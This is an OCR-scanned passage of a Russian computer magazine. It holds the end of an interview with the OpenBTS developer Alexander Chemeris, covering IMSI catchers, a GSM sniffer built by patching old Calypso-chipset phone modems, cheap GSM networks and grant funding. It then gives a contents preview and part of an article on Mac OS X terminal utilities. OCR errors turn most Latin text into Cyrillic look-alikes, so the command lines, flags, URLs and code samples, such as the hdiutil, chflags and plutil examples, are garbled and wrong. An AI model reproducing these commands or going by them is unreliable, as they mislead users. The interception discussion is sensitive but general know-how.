ценного 6Р5. 

Теперь относительно активного перехвата — классический ІМ5І 
сакЬег не роутит звонки. Его цель — просто собрать информацию. Чтобы 
сроутить звонок, нужно иметь подключение к сети оператора или скры- 
вать номер. Если ты попытаешься роутить звонок через другой модем, 
то у человека, который принимает звонок, отобразится телефон модема, 
которым ты пользуешься, что нехорошо. Также проблема в том, что чело- 
век будет недоступен, ведь он сидит на базовой станции, которая не под- 
ключена к оператору. Для всех остальных абонентов он вне сети. Поэтому 
я не знаю, насколько вообще реальна эта задача. 

Очень популярны так называемые полуактивные перехватчики. Они 
сначала цепляют на себя телефон, пытаются получить от него параметры 
шифрования, а потом уже отпускают его в сеть оператора. 

Есть еще одна интересная штука: очень старые телефоны, построен- 
ные на чипсете Саіурво. В какой-то момент в Сеть утекла информация 
о прошивке этого чипсета. Во-первых, люди нашли способ вклинить- 
ся в Ьооі Іоабег, перехватить управление в момент загруэки телефона. 
Примерно как для старых телефонов Біетепз. Во-вторых, нашли способ 
применять к прошивке так называемые бинарные патчи. 

Как правило, телефон состоит из арріісаііоп-процессора и модема. 
На арріісаііоп-процессоре выполняется все, что связано с интерфейсом 
пользователя. На старых телефонах это простенький процессор, кото- 
рый рисует менюшки, на современных аппаратах — мощнейшие двухъ- 
ядерные АРМ. И отдельно есть процессор, который обслуживает модем. 
Они общаются между собой по очень простому протоколу, по сути — об- 
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мениваются командами, как обычные модемы. Большинство прошивок 
для телефонов работают на уровне арріісаііоп-процессора. А то, что де- 
лается на модеме, недоступно. 

Для чипсета Саіурзо люди нашли возможность получить доступ к Ьоо( 
Іоасіег, который загружает прошивку в модем, и получить доступ к бинар- 
ным патчам для прошивки модема. 

Что такое бинарный патч? Дело в том, что прошивка зашита напря- 
мую — аппаратно, в РОМ. Но производитель оставил себе возможность 
исправлять баги следующим образом; можно загружать бинарные пат- 
чи, которые будут накладываться на прошивку и, например, передавать 
управление на какую-то другую об- 
ласть памяти, где реализована иная 
функция, а потом возвращаться об- 
ратно. 

Благодаря бинарным патчам раз- 
работчики вытащили из модема сырые 
данные. Смогли сделать так, чтобы 
сырые данные из модема после уровня 
и передавались на компьютер, вме- 
сто того чтобы передаваться дальше 
на обработку в модеме. Получился 
сниффер для 05М. 

Можно делать разные вещи, кото- 
рые для телефона не очень характер- 
ны. Подключаешь телефон серийным 
кабелем к компьютеру, загружаешь 
в него бинарный патч, и после он пол- 
ностью управляется с ПК, а не из вну- 
тренней прошивки. 



К примеру, мы используем телефоны как сканеры частот, чтобы по- 
нять радиообстановку и выбрать незанятый канал. Сканируем частоты, 
получаем Ьгоасісазі-сообщения, выделяем информацию о том, какие ба- 
зовые станции вещают вокруг, какие занимают частоты, и используем 
эту информацию для того, чтобы выбрать частоты, которые свободны. 
Также есть специальное приложение, называется Р55І сіізріау, оно по- 
казывает мощность сигнала на той или иной частоте прямо на экране. 

Плюс можно тюнить приемник или передатчик телефона на ту или 
иную частоту и использовать его для приема сигналов. Как декодировать 
этот сигнал дальше, это уж проблема софта. Такой полу-50Р-приемник. 

У него много ограничений, но он деше- 
вый. Найти такой телефон нетрудно, 
на Савеловском много. В основном это 
старые Моіогоіа, один 5опу Егісззоп, 
один РігеІІі и Орептоко-телефоны. 



ДА БУДЕТ 65М 



Есть два способа ведения бизнеса: де- 
лить уже существующий пирог или де- 
лать пирог больше. Я придерживаюсь 
идеологии, что размер пирога нужно 
увеличивать. 

У нас есть свой бизнес, который 
мы пытаемся запустить, и не нужно 
при этом мешать другим людям стро- 
ить другой бизнес, который никак 
не пересекается с нашим. Напротив, 
нужно помогать друг другу решать 
свои задачи. 



ЗАРУБЕЖНЫЕ ФОНДЫ 
ДАЮТ БОЛЬШИЕ 
ПО РОССИЙСКИМ 
МЕРКАМ ГРАНТЫ, 

НО МОРОКИ С БУМАГАМИ 
ТАМ НЕСРАВНИМО 
МЕНЬШЕ 





Интервью с Александром Чемерисом 




Гаігшаѵез 

К 



Базовая станция 
11т51ТЕ:водной 
коробке находится 
все необходимое 
для развертывания 
65М-сетей 



Существует очень много компаний, долгое время 
занимавшихся интернет-бизнесом и теперь желаю- 
щих заниматься бизнесом мобильным. Однако они 
всю жизнь вращались в одной сфере, они очень 
плохо понимают, как работает мобильная сеть. Мы 
даем им возможность запустить свою сеть с ми- 
нимальными затратами, с минимальными вложениями людских ресур- 
сов. По сути, скрываем все трудности развертывания сети от оператора, 
а он получает самое интересное и может заниматься маркетингом, про- 
дажами, зарабатывать деньги. 

При существующих технологиях операторы не берутся покрывать ры- 
нок, если не могут собрать на нем больше 3 долларов АРРІ) (выручка с од- 
ного абонента в месяц). Зачастую эта цифра даже выше. Таким образом, 
получается, что поднимать 26- и Зб-сети дорого, и это уже устарело, а 46, 
хоть и идет в ногу со временем, стоит не просто дорого, а непомерно дорого. 

Цель ОрепВТБ — сделать дешевый 65М. Нам, как коммерческой ком- 
пании, это дает воэможность работать с небольшими мобильными опе- 
раторами и компаниями, которые хотят стать таковыми, и давать им воз- 
можность строить сети с минимальным САРЕХ (сарііаі ехрепБез) и ОРЕХ 
(орегаііопаі ехрепзез). 

Конечный продукт — полное решение, включающее базовую станцию 
ІІтБІТЕ, ПО для опорной сети оператора и систему реализации дополни- 
тельных сервисов, необходимые для ее работы компоненты и ПО. 

Мы используем разные проекты (ОрепВТБ, Ргее5\ѵисЫ, стыкуем все 
это вместе и предоставляем покупателям уже полноценное решение. 

В целом архитектура 65М сети такова. Есть вышки, на них ставится ан- 
тенна, ставятся усилители, после них — трансивер и сервер с ОрепВТБ. 
Мы надеемся большую часть всего этого уложить в одну коробку. Будет 
ящик, с одной стороны в него будет входить ЕіИегпеІ, а с другой — вы- 
ходить толстый кабель на антенну. Все остальное (усилители, трансивер, 
сервер с ОрепВТБ) будет упаковано внутри. 

ЕІЬегпеІ уходит для подключения к опорной сети. Либо будет просто 
включаться пришедший медью кабель, либо дальше он будет трансфор- 
мироваться в какой-то беспроводной протокол, будет ставиться радио- 
релейка, спутниковый канал. Обычно все это делается по ЕіЬегпеІ. Либо 
прямо на базовую станцию, либо на вышку приходит медь, или оптика 
конвертируется в медь. Или же мы по ЕіЬегпеІ подключаемся к спутнику 
или к чему-то другому. 

Часто это называют транспортной сетью, а опорной сетью называют 
то, что стоит у оператора в дата-центре. То есть это можно назвать транс- 
портной сетью, а она уже подключается к опорной сети, которая стоит 
у оператора в дата-центре. В дата-центре находится стойка с серверами, 
на серверах Еіпих, а на нем те самые компоненты, о которых я уже гово- 
рил выше: 5М5-центр, АТС, сервер регистрации. 

Выводить звонки наружу можно по ѴоІР, можно стыковаться через 
557 и так далее. 

В среднем одного современного сервера хватает на пару сотен тысяч 
абонентов. Думаю, для небольшой инсталляции, скажем если сеть подни- 
мать на острове, понадобится от 20 до 60 базовых станций и по одному сер- 
веру на сервис. Плюс горячее резервирование. То есть — обычная стойка. 

Главное — получается ощутимо дешевле, чем в случае обычной 65М- 
сети. Если вы покупаете опорную сеть у какого-нибудь 2ТЕ или Ниаѵѵеі, 
то просто эти серверы, которые вы ставите в стойку, обойдутся в пару 
миллионов долларов. Понятно, что дело не в железе и не в серверах, 
а в том софте, который вы получаете. 

Так как мы используем ѴоІР-решение, оно стоит на порядок дешев- 
ле. Та же опорная сеть, построенная на ѴоІР, будет стоить несколько де- 



сятков тысяч долларов; даже для крупной сети можно уложиться до ста 
тысяч. Понятно, что если вы покрываете всю Москву, то пара миллионов 
долларов за сервер — это ничто. Но если вы покрываете небольшой ре- 
гион, остров, страну, .эти пара миллионов долларов уже являются суще- 
ственной частью бюджета. Экономия от перехода на ѴоІР уже ощутимая. 
Также благодаря ѴоІР становится возможной легкая реализация допол- 
нительных сервисов. 

Одно из недостающих звеньев на данный момент — система управле- 
ния несколькими БС. Мы поняли, что при наличии большого числа стан- 
ций их обслуживание становится сложной задачей, и сейчас над этим 
работаем. 

Для реализации дополнительных сервисов (ѴА$) мы интегрируемся 
с сервисом 5ѵ\^і(сЬсо(1ег.сот. Можно войти, зарегистрироваться, у тебя 
сразу будет 10 баксов на счету, и ты можешь писать свои сервисы. Ты по- 
купаешьтолько номер, а деньги берутся за минуту использования номера 
или за одну 5М5. Все очень просто. 

Всем нашим клиентам мы будем предлагать подключить их сеть 
к данному сервису, чтобы пользователи оператора могли сами реализо- 
вывать дополнительные сервисы. Конечно, мы будем вести переговоры 
с существующими сервисами, чтобы интегрировать их с нашими сетями. 

Скрипты для БѵѵисЬсосІег может писать кто угодно, это очень просто. 
Вот простенький ІѴР, который дает возможность выбрать какие-то опции 
и что-то проигрывает. Можно делать 5М5-голосовалки. Вот кусочек кода 
на ^аѵа5сгір^, позволяющий реализовать голосовалку. Вот групповой 
месседжинг — ты подключаешься к группе, и каждый, кто пишет в груп- 
пу, получает сообщение. Реализуется в 20-30 строк кода. 



АССЕ58 6РАМТЕ0 



Основные источники финансирования Раіпѵаѵез — на данный момент — 
заказы от клиентов и гранты от фондов. Например, у нас есть партнер 
из Франции, который делает нам печатные платы. Он же финансировал 
разработку железа. Его интерес заключается в том, что у него есть ли- 
цензии на частоты на острове Майотта (французский остров, около Ма- 
дагаскара) и он там хочет построить Іоѵѵ-созі-сеть. 

В мае 201 1 мне пришло приглашение от некоммерческой организации 
Ме\л/ Атегіса Роип(1а(іоп. Они позвали меня поучаствовать в хакатоне, 
посвященном их новому проекту Сотглоііоп. В интернете он больше из- 
вестен как Іпіегпеі іп а зиіісазе. В основном они собрали людей, которые 
занимаются ѴѴі-Рі ппезЬ технологиями, но в том числе пригласили и меня 
как представителя проекта ОрепВТБ. 

Был двухдневный хакатон, где все мы познакомились, пообщались, 
обменялись идеями. Нам сказали: у нас есть деньги, которые мы ходим 
потратить на ваши проекты. Это были проекты ОІБРсІ, это демон роу- 
тинга для меш-сетей, БегѵаІ, ІЛ/і-Рі тезЬ сети для АпсігоісІ-телефонов, 
и ОрепВТБ. Конечно, я сказал: да, давайте. С тех пор они нас финанси- 
руют. Все наши софтверные разработки — это их финансирование. То, 
что мы разрабатываем 6РРБ, — полностью профинансировано ими. 

У них единственное условие — все, что мы делаем, должно выклады- 
ваться под одной из ореп зоигсе лицензий. Больше никаких ограничений 
они на нас не накладывают, кроме, конечно, выполнения того, что мы им 
пообещали. Мы обещаем им, что мы реализуем это и то, а они платят нам 
деньги за реализацию и выкладку ореп зоигсе. 

Помимо того француза, нашу железную разработку финансирует ни- 
дерландский фонд Міпеі Роипсіаііоп. Интересное место для тех, кто зани- 
мается ореп зоигсе разработками, которые могут привнести серьезные 
сдвиги в развитие интернета и передачу информации. Размер гранта 
может достигать 30 тысяч евро. 

Притом что зарубежные фонды дают большие по российским меркам 
гранты, мороки с бумагами там несравнимо меньше. У Міпеі, например, 
почти нет отчетности. Ты делаешь работу, представляешь ее, и это и есть 
твоя отчетность. Для получения гранта заполняешь заявку на одной 
странице и после буквально отчитываешься коммитами в репозиторий. 

Если бы мы не были ореп зоигсе, мы бы ничего этого никогда не сде- 
лали. Непонятно, откуда мы брали бы деньги, никакие инвесторы в рос- 
сийскую компанию на таком этапе не вложатся. Найти финансирование 
было бы крайне трудно. □□ 
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Ргеѵіеѵѵ 



33 страницы на одной полосе. 
Тизер некоторых статей. 



РС20МЕ 



СЮРПРИЗ из КОРОБКИ 

28 Продолжаемразговорожизни в«яблоч- 
ной» консоли. Ни для кого не секрет, 
чтовоснове МасОБХлежитполный 
набор системных утилит, характер- 
ных для любой иМІХ-системы. Но есть 
ли отличия? В этом обзоре мы собрали 
консольные утилиты, которые доступны 
каждому пользователю Мае из коробки. 
Большинство этих утилит недоступны 
пользователям других ОС. 

В обзор вошли утилиты для об- 
работки текста, изображений, работы 
с файловой системой и настройками ОС. 
Не забыли даже проутилиты, способные 
вслух зачитыватьтекст. В общем, полу- 
чился оченьтрушный мануал по ОБХ 
для иМІХ-гиков. 




РС20МЕ СЦЕНА 



Х-МОВІІЕ 




ПЛАНОВЫЕ РАБОТЫ 

32 Обзор сервисов совместной работы: 

платные и нет, облачные и оп ргетізез, 
для маленьких и для больших команд. 



38 



КАК ПРОДАВАЛИ СЛОНА 

Интереснейший рассказ об истории 
развития российского рынка игровых 
приставок 90-х годов. 



50 



РАСКРУТИТЬ И ЗАРАБОТАТЬ 

Обзор всех основных маркетов для про- 
дажи Апсігоісі-приложений. Не Соодіе РІау 
единым, аты какдумал? 



ВЗЛОМ 



МАШАКЕ 




68 



РОБОТЫ ОШИБАЮТСЯ 

Разворачиваем среду ДЛЯ дебаггинга 
и анализа работы мобильных приложений 
под операционную системуАпсігоісі. 



90 



ЕСЛИЗАВТРАКИБЕРВОЙНА 

Футурологический анализ возможных 
сценариев начала мировой войны суча- 
стием кибероружия. 



94 



Т0Р-5САМЫХТЕХН0Л0ГИЧНЫХУГР03 
УШЕДШЕГО ГОДА 

Ретроспектива самых нашумевших 
вредоносов последнего года. 
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РС20МЕ 



Михаил Еловских (ѵѵгопдііпкіддтаіі.сот) 




ДОПОЛНИТЕЛЬНЫЕ 
ВОЗМОЖНОСТИ консоли 
05 X для ГУРУОНІХ 



Если покопаться в недрах Мае 05 X, то выясняется, что делали 
ее такие же гики, как и мы с тобой. И эти люди оставили в стан- 
дартной поставке ОС немало игрушек «для своих» — мощных 
и функциональных утилит, аналогов которым часто нет ни в од- 
ной другой *піх-системе. Сегодня мы поговорим о командах, 
способных значительно улучшить твою жизнь в этой ОС. 




I Д ИСКОВЫЕ УТИЛИТЫІ 

оізкитіі 

Приложение сіізкиііі служит для управле- 
ния дисками, разделами и РАІО-массивами. 

Под диском подразумевается как НПО или СО/ 
ОѴО, так и 550 и флеш-накопители. В арсенале 
утилиты находятся команды вывода краткой 
сводки о дисках в целом и подробной инфор- 
мации о каждом устройстве, форматирования, 
разбиения на разделы и объединения разде- 
лов, монтирования и демонтирования дисков, 
очистка и восстановление, а также специфич- 
ные операции по «тонкой» настройке, такие 
как увеличение размера журнала файловой 
системы или безопасная очистка диска. 

Кстати, с помощью сіізкиііі можно попро- 
бовать новую технологию «умного» объедине- 
ния 500 и обычного НОО, которая называется 
Ризіоп Огіѵе. Арріе анонсировала ее только 
для новой линейки аймаков, но умельцы 
нашли способ использовать ее и в макбуках 
(для этого, разумеется, на место встроенно- 
го ОѴО ставится дополнительный 550). Так 
как набор действий получился довольно боль- 
шим, мы ограничимся ссылкой на наиболее 
полную статью по данной теме (Ьі1.Іѵ/12СѵсідЕ І. 

НОШТІІ 

Эта утилита позволяет управлять образами 
диска — те самые файлы с расширением сітд. 
Она умеет создавать, проверять, конвертиро- 
вать, монтировать, демонтировать и прожигать 
образы дисков. Простым примером ее исполь- 
зования может служить следующая команда: 

$ ЬсІіи1:і1 сгеа'Ье ту^іта^е . с1т§ 

-згсТоІсІег ~/ту_-Ро1с1ег/ 

В результате будет создан образ с содер- 
жимым папки ~/ту_^о1с1ег/. Кстати, для соз- 
дания красивых «инсталляционных» образов 
в лучших традициях Мае 05 X одной Ьсііиііі 
будет недостаточно. Здесь нам на помощь при- 
дут различные инструменты, например скрипт 
>1 и р 5 ://д I : п и о . с : т, а.п с ^ с у ‘ ; у э и г з : у - : г п : - 
сіппд или программа ОгорОМб 1с-соттапгі. 
сот/сігорсіппд і. 

ОРУТІІ 

Работа с СО/ОѴО из консоли. Умеет выводить 
различные параметры и информацию о сиди- 
ромах, прожигать образ или папку на диск, 
открывать трей (точнее, извлекать диск 
из трея). Для того чтобы послушать в машине 
Аисііо СО, вставим болванку, удостоверимся, 
что она пустая: 

$ сІги-ЬіІ з-^а-^из 

Ѵепсіог Ргосіисі: Кеѵ 
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Сюрпризы из коробки 



I в о о Ми&іс — \ѵгоп9Ііпк@\Л/гоп9Ііпк-МасВооіс: >»/Ми5іс — дгиШ ~ 90x24 
^/Ниііс$ (Ігиііі Ьигп -аибіо “2его 7/МЬеп И РаІІ$*' 

Ѳигпіпд Аисііо 0і$с: 2его 7/ИЬеп И РаІІ 5 

2012-12-18 01:00:32.437 дгиШ [1328: 707] Роипб: 01 Магш $оип(1.ярЗ 
2012-12-18 01:00:32.547 8гиииі328:707] Роипб: 02 Ноше.шрЗ 
2012-12-18 01:00:32.642 бгиШ [1328: 707] Роипб: 03 5отег$аии.ярЗ 
2012-12-18 01:00:32.704 <5гииі[1328:707] РоиіЮ: 04 Оѵег Оиг Неа8$.ярЗ 
2012-12-18 01:00:32.773 ОгиПІ [1328: 707] Роипд: 05 Ра$5іпд 8у.ярЗ 
2012-12-18 01:00:32.850 0ги(ІІ [1328: 707] Роипб: 06 МНеп И РаІІ 5 .ярЗ 
2012-12-18 01:00:32.933 бгиПІ [1328: 707] Роипб: 07 ТЬе 5расе 8е(мееп.ярЗ 
2012-12-18 01:00:33.017 0гит[1328:707] Роип<1: 08 Юок Цр.ярЗ 
2012-12-18 01:00:33.087 дгит[1328:707] Роип<1: 09 Іп Тіяе.шрЗ 
2012-12-18 01:00:33.140 8ги^іІ[1328:707] Роип<1: 10 Зрееб Оіаі Ыо. 2.ярЗ 
2012-12-18 01:00:33.230 дгит [1328: 707] Роипд: 11 Ногпіпд 5опд.ярЗ 
іНгіІіпо <гаск 7 ... ] 58 % 1 



НІ-0Т-5Т ОѴОКИ С531М ТА17 

Туре: СО-К 

Маше: /сІеѵ/с1і5к4 

МгіТе 5реесІ5: 10х, 1бx^ 24х 

ОѵегмгіТаЫе: 79:57:71 

Ыоск5 : 359846/736 . 96МВ/702 . 82МІВ 

Брасе Ргее: 79:57:71 

Ыоск5 : 359846/736 . 96МВ/702 . 82МІВ 

Брасе УзесІ: 00:00:00 

Ыоскз: 0/0.00МВ/0.00МІВ 

ИгіТаЬіІіТу: аррепсІаЫе, Ыапк^ ♦-< 

оѵегмгіТаЫе 

и нарежем командой Ьигп с параметром -аисііо: 

$ сІгиТіІ Ьигп -аисііо «-• 

"2его 7/МЬеп ІТ Раііз" 



РАБОТА С ФАЙЛАМИ 

ОРЕМ 

Эта команда позволяет открывать файлы и ди- 
ректории в окружении 6111. Небольшой пример: 

$ ореп . 

откроет в Ріпсіег'е текущий путь. А если вместо 
точки поставить имя файла: 

$ ореп Яомег.зрб 

то он откроется приложением, ассоциирован- 
ным с типом файла. Так, картинка из примера 
откроется в системном Ргеѵіеѵѵ. Кстати, ореп 
отлично поддерживает протоколы приложе- 
ний. Поэтому команда: 

$ ореп тасарр5Тоге://іТипе5.арр1е.сот/.-і 
еп/арр/хсоае/ісІ497799835?т1:=12 

откроет Арр Біоге на странице приложения 
ХСобе. 

Кстати, в Мае 08 возможна и обратная 
операция. Если перетащить файл (или папку) 
из окна Ріпсіег'а в окно терминала, то в терми- 
нал вставится полный путь к нему. Анало- 
гично можно вместо с1гад-апс1-с1гор'а просто 
скопировать файл в буфер обмена и вставить 
в терминал. Поэтому отредактировать в виме 
файл, открытый в 6111, можно так: 

$ ѵіт <перетащите файл в терминал> 

СНР1А65 

Несмотря на одноименную команду из РгееВЗО 
и схожую идею (установка специальных флагов 
на файлы и директории), эта команда сильно 
отличается доступным списком флагов. В мире 
Ыпих аналогом можно назвать команду сЬаиг. 
Итак, пользователю доступны флаги: 

• агсЬ,агсЫѵес1 — флагархивации; 

• заррпсі, заррепсі — разрешениетолько 
добавления новыхфайлов в директорию 
на уровне системы; 

• 5сЬд, зсИапде, зітппиІаЫе — блокировка 
файла на изменение на уровне системы; 

• иаррпсі, иаррепсі — разрешениетолько 



Прожиг диска из консоли 

добавления новыхфайлов в директорию 
на уровне пользователя; 

• исЬд, исЬапде, иіттиІаЫе— блокировка 
файла на изменение на уровне пользовате- 
ля; 

• Ысісіеп — установка невидимости файла 
длябІЛ (например, для Ріпсіег'а). 

Для снятия соответствующих флагов не- 
обходимо добавить «по» там, где имя флага 
не начинается с «по», и наоборот для осталь- 
ных флагов. Например, флаг 'Ысісіеп' снимается 
’поЫсІсІеп', а ’посіитр’ очищает флаг ’сіиппр'. 

Самое простое применение этой коман- 
ды — отключение скрытия директории -/ 
ЫЬгагу/ в каталоге пользователя (в которой 
обычно хранятся данные настроек в програм- 
мах). По умолчанию эта папка скрыта в целях 
безопасности, поэтому приходится прибегать 
к различным обходным путям, типа <Стс1 + 6> 
или команды ореп -/ІіЬгагу в терминале. Хотя 
с помощью сЫІадз проблема решается в два 
счета: 

$ сЬЛаез поЬісІсІеп --/ИЬгагу 

мо15,моут11иморто 

Многие пользователи по достоинству оценили 
скорость и качество работы поиска в Мае 05 X. 
Перечисленные команды взаимодействуют 
с системным сервисом поиска 5роЫдЫ и по- 
зволяют работать с ним из консоли. 

Первая выводит список метаданных файла 
(по сути, тех данных, которые попадут в индекс 
ЗроЫдЫ'а). Эти метаданные можно потом ис- 
пользовать в тс11іп(1. 

$ тс1І5 ~/0омп1оасІ5/іли5Істапаеег.с1т§ 
_кТітеМасЬіпеІ5Сгеа‘СіопМагкег = 1 
_кТітеМасI^іпеNеме5■СБпар5Ьо•С = ♦-< 
4001-01-01 00:00:00 +0000 
^кТітеМасЬіпеОІсІезіБпарзИо-І: 

2012-12-09 07:37:11 +0000 
кМОІіетСопіепіСгеаііопОа^е 
2012-12-09 09:17:12 +0000 
кМОІіетСопіепіМосІібсаііопОаіе =♦-« 
2012-12-09 09:17:58 +0000 
кМОІіетСопіепІТуре =— 
"сот.арр1е.сІІ5к-іта§е-ис1і-Р" 
кМОІіешСопіепіТуреТгее = ( 

"сош.арріе.сіізк-ітабе-исіі-р". 



"сот.арріе.сіізк-ітаее", 

"риЫіс.агсНіѵе", 

"риЫіс.с1а-1:а"л 

"риЫіс.ііет", 

"риЫіс.сІізк-іпіаее" 

) 

кМОІ-СетОаіеАсІсІесІ = 

2012-12-09 09:17:58 +0000 
кМОІіетОізрІауМате = «-« 

"тизіешапаеег . сІт§" 
кМ0ІіетР5СопіепіСІіап§е0а1:е = 

2012-12-09 09:17:58 +0000 
кМОІіетРБСгеаііопОаіе = 

2012-12-09 09:17:12 +0000 
кМОІіетРБСгеа'СогСосІе = 
кМОІіетРБРіпсІегРІаез = 0 
кМОІіетРБНазСизіотІсоп = 0 
кМОІіетРБІпѵізіЫе = 0 
кМ0ІіетРБІ5Ех1:еп5іопНісІсІеп = 0 
кМОІіетРБІзБіа-Сіопегу = 0 
кМОІіетРБІаЬеІ = 0 
кМ^I1:етР5Nате = "ти5істапа§ег.сІт8" 
кМОІіетРБМосІеСоипІ: = 37143207 
кМОІіетРБОмпегбгоирІО = 20 
кМОІіетРБОмпегизегІО = 501 
кМОІіетРББіге = 37143207 
кМОІіетРБТуреСосІе = "" 
кМОІіетКіпсІ = "Оізк Іта§е" 
кМОІіетІоеісаІБіге = 37143207 
кМОІіетРИузісаІБіге = 37146624 
кМОІіетМИегеРготз = ( 

"ІгСірз : //сіі . 800 § 1 е . сот/сІ1/апсІгоісІ-«-' 
Зитрег/тас/511573/ти5істапа§ег . сІт§" , 
"Ьіірз : //ріау . §оо§1е . сот/ти5іс/1і$іеп" 

) 

Вторая, тгіиііі, позволяет управлять данны- 
ми индекса поиска: удаление кеша параметра- 
ми -р и -Е и включение/отключение индекси- 
рования для дисков параметром -і. 

Третья команда, наверное наиболее 
пригодная для пользователя, осуществляет 
поиск по индексу. Альтернативой ей в каком- 
то смысле может служить стандартный ЛпЬ. 

Но есть несколько важных отличий: 

• тсіЛпс] ищет данные по заранее собранному 
кешу, соответственно, поиск будет идти 
значительно быстрее; 

• Япсі заточен на поиск по имени файла, тогда 
как пгі(і[іпсі специализируется на метаданных 
файла; 
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• тсі^іпсі принимаетнавходпоисковуюстроку 

особого формата. 

В качестве примера использования найдем 
все песни по имени артиста в папке Мизіс: 

$ тсібпсі -опіуіп ~/Мизіс/ «-• 

' кМ0І1:етАи1:Иог5=*’ІасІу СаСа" ' 
/ІІзегз/мгопвІіпк/Мизіс/ІасІу СаСа/^-* 

ТЬе Рате Моп$1:ег/1-08 ТееІИ.трЗ 
/изегз/мгопбІіпк/Мизіс/ІасІу СаСа/*-* 

ТИе Рате Моп5-Сег/1-04 БреесЫезз.трЗ 
/ІІБег5/\л»гопе1іпк/Ми5Іс/Іас1у баба/*-* 

ТИе Рате Моп5-Ьег/1-02 АІез’апсІго.трЗ 



ТЕхтитіі 

Довольно мощная утилита для конвертации 
формата текстовых файлов. Список доступ- 
ных форматов включает в себя НТМІ, РТР, 
документы (в том числе формата сіосх), 
документы ОрепОНісе ѴѴгіІег, а также формат 
ѴѴеЬагсЫѵе (формат сохраненных полностью 
веб-страниц). Следующая команда собирает 
один большой файл іпсіех.ЫтІ с заголовком 
«Му РТР ^ііез» из содержимого всех найденных 
РТР-файлов в текущей директории: 

$ Тех-ЬиТіІ -саі ІтСтІ -Ііііе «-« 

"Му КТР біез" -оиііриі: іпсІех.ІтСтІ *.гТТ 

ріитіі 

Эта небольшая утилитка умеет работать 
с рІізГами — файлами настроек в Мае 05 
(Рге^егепсез Ызі), аналогичными гс-файлам 
в Ыпих или іпі-файлам в \^іпсіоѵѵз. Дело в том, 
что это один из самых распространенных фай- 
лов в операционной системе, и большинство 
программ хранят свои конфиги именно в этом 
формате. Обычным местоположением таких 
файлов является директория -/иЬгагу в ката- 
логе пользователя или глобальная системная 
/иЬгагу. Утилита рІи^іІ выполняет две задачи: 
проверку синтаксиса ріізі-файла и конверта- 
цию формата ріізі-файла. 

И если с первым пунктом все довольно 
просто — проверка синтаксиса файла после, 
например, ручной правки, то на втором пункте 
хотелось бы остановиться подробней. Дело 
в том, что Мае 05 допускает три типа формата 
данных ріізі-файлов: бинарный, ХМІ и 350М. 

И если программа хранит свои настройки 
именно в бинарном формате, то прочитать или 
отредактировать их из текстового редактора 
становится довольно трудно. Разумеется, 
тут нам на помощь и приходит конвертор 
форматов. Рассмотрим на примере настроек 
скринсейвера. Они находятся в файле 
-/иЬгагу/Рге^егепсез/сот.аррІе.зсгеепзаѵег. 
ріізі и в бинарном формате имеют вид: 

Ьр1із‘С00О'^А''В^С^О''а5кРогРа55МОГСІ_''Р''5а.-^ 
зкРогРаззмогсЮеІау. . . 

Скопируем файл в домашний каталог 
и переведем его в более пригодный для редак- 
тирования формат: 




Скриншот из зсгеепсарШге 



$ ср ~/ІіЬгагу/Рге-Регепсез/»-^ 
сот.арріезсгеепзаѵег.ріізі: 

~/сот. арріе. зсгеепзаѵег. рІіз'С 

$ ріи-сіі -сопѵег'С хтіі 

сот . арріе . зсгеепзаѵег . ріізі: 

$ са*С сот.аррІе.зсгеепзаѵег.рИзІ 
<?хт1 ѵег5іоп="1.0" епсосІіп§="ІЯР-8"?> 
<!ООСТУРЕ ріізі: РУВІІС "-//Арр1е//ОТО .-і 
РІІ 5Т 1.0//ЕN" "Н'1:1:р://ѵлѵм.арр1е.сот/«-‘ 
ОТОз/РгорегІуІіз-С-1 . 0 . сііс!" > 

<р1із-С ѵег5іоп="1.0"> 

<сІіс-С> 

<кеу>а5кРогРаз5могсІ</кеу> 

<іп-Се§ег>1</іп-Се§ег> 

<кеу>а5кРогРа55могсЮе1ау</кеу> 

<геа1>0.0</геа1> 

</с1ісС> 

</р1і5-С> 

Или в 350М (ключ '-г' говорит ріиііі использо- 
вать читабельный формат с пробелами и отсту- 
пами): 

$ р1и"Сі1 -сопѵегі ^50п -г сот.арр1е.«-' 
зсгеепзаѵег.рІіз'С 
$ саі сот.арріе.зсгеепзаѵег.ріізі 
{ 

"азкРогРаззмогсЮеІау" : 0 ^ 
"азкРогРаззмогсІ" : 1 

} 

После редактирования можно сконвертиро- 
вать файл обратно в бинарный формат и по- 
ложить вместо старого. 

I СИСТЕМНЫЕ НАСТРОЙКИІ 

5Ѵ5ТЕМ.РК0РІІЕР 

Утилита с говорящим названием выводит 
отчеты о железе и конфигурации ПО. Умеет 
генерировать текстовые отчеты: 

$ 5уз1ет_ргоб1ег -сІе-СаіІІеѵеІ тіпі 

либо может экспортировать данные в формате 
ХМІ. Интересный факт: если экспортировать 
в файл с расширением зрх, то этот файл можно 
будет открыть в стандартном приложении 



5уз1ет (п^оггпаііоп, которое по умолчанию по- 
казывает состояние текущей системы: 

$ зу5Іет_ргоб1ег -хті > 
ту_зу5І:ет_сопб8 . зрх 

$ ореп ~/ту_зуз-Сет_сопб§.зрх 

ОЕРАУІТЗ 

Определенно, у этой команды самый широкий 
список возможностей по настройке и кастоми- 
зации системы и приложений. Все просто — 
она позволяет осуществлять запись и чтение 
самых разных настроек системы в одном 
месте. У каждой настройки есть ключ, по кото- 
рому ее можно прочитать или записать. Группы 
настроек объединяются в группы (домены). 
Посмотреть список всех доступных доменов 
можно командой: 

$ йе-РаиИз сіотаіпз 

Команда геас) выводит настройки для кон- 
кретного ключа, домена или вообще все 
известные конфиги. (Например, параметры 
погодного виджета с дашборда: 

$ гіеРаиИз геасі місІве'Ь-сот.аррІе.»-' 
місІбеІ.меа'СЬег 
{ 

"0000000000000004-сеІсіиз" = 1; 
"0000000000000004- соІІарзесГ = -Раізе; 

" 0000000000000004 - у аЬооВас кз іае^ 

Сі-Ьу51:гіп8" = "Ѵека-СегіпЬиг^, 

Бѵегсііоѵзкауа ОЫазІ (Киззіа)"; 

" 0000000000000004 - у а ЬооР гоп^ 5 іае4-« 

Сі-Ьу51:гіп8" = Ѵека-СегіпЬиг§; 

"0000000000000004-уаЬооРоз‘^аІ" = 
"К5ХХ0123) 2112237"; 

} 

Команда ѵѵгііе, наоборот, позволяет устано- 
вить значение для ключа. Например, следу- 
ющая команда добавит в меню Мае Арр 5іоге 
пункт меню «ОеЬид», в котором находится 
несколько довольно любопытных опций: 

$ сІе-РаиІ-Сз мгі-Ье сот.аррІе.аррз-Ьоге ♦-< 
5ЬомОеЬи§Мепи -Ьооі •^гие 
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Сюрпризы из коробки 




фв Оі=- ѵі^~- -- 



Включение дебагного меню в Арр 5!оге 

Надо заметить, что список возможных 
настроек очень большой, поэтому наиболее 
